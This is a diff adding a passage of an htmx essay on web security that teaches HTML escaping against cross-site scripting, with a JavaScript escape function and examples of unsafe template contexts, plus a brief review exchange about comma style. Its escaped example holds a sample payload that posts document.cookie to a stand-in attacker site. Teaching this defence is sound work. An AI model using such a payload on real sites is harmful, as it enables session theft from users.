www/content/essays/web-security-basics-with-htmx.md

```diff
@@ -0,0 +1,322 @@
+</script>
+</p>
+```
+
+Fortunately this one is so easy to fix that you can write the code yourself. Whenever you insert untrusted (i.e. user-provided) data, you just have to replace eight characters with their non-code equivalents. This is an example using JavaScript:
+
+```js
+/**
+ * Replace any characters that could be used to inject a malicious script in an HTML context.
+ */
+export function escapeHtmlText (value) {
+  const stringValue = value.toString()
+  const entityMap = {
+    '&': '&amp;',
+    '<': '&lt;',
+    '>': '&gt;',
+    '"': '&quot;',
+    "'": '&#x27;',
+    '/': '&#x2F;',
+    '`': '&grave;',
+    '=': '&#x3D;'
+  }
+
+  // Match any of the characters inside /[ ... ]/
+  const regex = /[&<>"'`=/]/g
+  return stringValue.replace(regex, match => entityMap[match])
+}
+```
+
+This tiny JS function replaces `<` with `&lt;`, `"` with `&quot;`, and so on. These characters will still render properly as `<` and `"` when they're used in the text, but can't be interpreted as code constructs. The previous malicious bio will now be converted into the following HTML:
+
+```html
+<p class=bio>
+&lt;script&gt;
+  fetch(&#x27;evilwebsite.com&#x27;, { method: &#x27;POST&#x27;, data: document.cookie })
+&lt;/script&gt;
+</p>
+```
+
+which displays harmlessly as text.
+
+Fortunately, as established above, you don't have to do your escaping manually—I just wanted to demonstrate how simple these concepts are. Every template engine has an auto-escaping feature, and you're going to want to use a template engine anyway. Just make sure that escaping is enabled, and send all your HTML through it.
+
+### Only serve user-generated content inside HTML tags
+
+This is an addendum to the template engine rule, but it's important enough to call out on its own. Do not allow your users to define arbitrary CSS or JS content, even with your auto-escaping template engine.
+
+```html
+<!-- Don't include inside script tags -->
+<script>
+  const userName = {{ user.name }}
+</script>
+
+<!-- Don't include inside CSS tags -->
+<style>
+  h1 { color: {{ user.favorite_color }} }
+</style>
+```
+
+And, don't use user-defined attributes or tag names either:
+```html
+<!-- Don't allow user-defined tag names -->
+<{{ user.tag }}></{{ user.tag }}>
+
+<!-- Don't allow user-defined attributes -->
+<a {{ user.attribute }}></a>
+
+<!-- User-defined attribute VALUES are sometimes okay, it depends -->
+<a class="{{ user.class }}"></a>
+
+<!-- Escaped content is always safe inside HTML tags (this is fine) -->
+<a>{{ user.name }}</a>
+```
+
+CSS, JavaScript, and HTML attributes are ["dangerous contexts,"](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#dangerous-contexts) places where it's not safe to allow arbitrary user input, even if it's escaped. Escaping will protect you from some vulnerabilities here, but not all of them; the vulnerabilities are varied enough that it's safest to default to not doing *any* of these.
```

Comment:
It would be better to keep the comma on the right of the link markup.

Reply:
I went back and forth on this, but I'm sticking with the American English style style.